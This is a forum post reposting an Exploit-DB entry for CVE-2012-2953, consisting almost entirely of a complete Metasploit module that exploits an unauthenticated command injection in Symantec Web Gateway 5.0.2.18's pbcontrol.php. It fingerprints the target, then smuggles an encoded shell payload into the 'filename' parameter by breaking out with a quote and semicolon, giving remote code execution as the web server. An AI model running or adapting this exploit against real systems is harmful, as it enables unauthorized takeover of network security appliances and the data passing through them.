Jump to content
Wubi

Symantec Web Gateway 5.0.2.18 pbcontrol.php Command Injection

Recommended Posts

Posted

Symantec Web Gateway 5.0.2.18 pbcontrol.php Command Injection

[table=width: 500, class: grid]

[tr]

[td]EDB-ID: 20113[/td]

[td]CVE: 2012-2953 [/td]

[td]OSVDB-ID: N/A[/td]

[/tr]

[tr]

[td]Author: metasploit[/td]

[td]Published: 2012-07-27[/td]

[td]Verified: accept.png[/td]

[/tr]

[tr]

[td]Exploit Code: 46.png[/td]

[td]Vulnerable App: N/A[/td]

[td][/td]

[/tr]

[/table]

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info={})
super(update_info(info,
'Name' => "Symantec Web Gateway 5.0.2.18 pbcontrol.php Command Injection",
'Description' => %q{
This module exploits a command injection vulnerability found in Symantec Web
Gateway's HTTP service. While handling the filename parameter, the Spywall API
does not do any filtering before passing it to an exec() call in proxy_file(),
thus results in remote code execution under the context of the web server. Please
note authentication is NOT needed to gain access.
},
'License' => MSF_LICENSE,
'Author' =>
[
'muts', # Original discovery
'sinn3r' # Metasploit
],
'References' =>
[
[ 'CVE', '2012-2953' ],
[ 'BID', '54426' ],
[ 'EDB', '20088' ],
[ 'URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120720_00']
],
'Payload' =>
{
#'BadChars' => "\x00\x0d\x0a",
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl bash telnet'
}
},
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' =>
[
['Symantec Web Gateway 5.0.2.18', {}]
],
'Privileged' => false,
'DisclosureDate' => "Jul 23 2012",
'DefaultTarget' => 0))

register_options(
[
OptString.new('TARGETURI', [true, 'The URI path to pbcontrol', '/spywall/pbcontrol.php'])
], self.class)
end


def check
dir = File.dirname(target_uri.path)

res1 = send_request_raw({'uri' => "#{dir}/login.php"})
res2 = send_request_raw({'uri' => "#{dir}/pbcontrol.php"})

if res1 and res2
if res1.body =~ /\<title\>Symantec Web Gateway\<\/title\>/ and res2.body =~ /^0$/
return Exploit::CheckCode::Detected
end
end

return Exploit::CheckCode::Safe
end


def exploit
send_request_cgi({
'uri' => target_uri.path,
'method' => 'GET',
'vars_get' => {
'filename' => "#{Rex::Text.rand_text_alpha(4)}\";#{payload.encoded};\"",
'stage' => '0'
}
})

handler
end

end

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...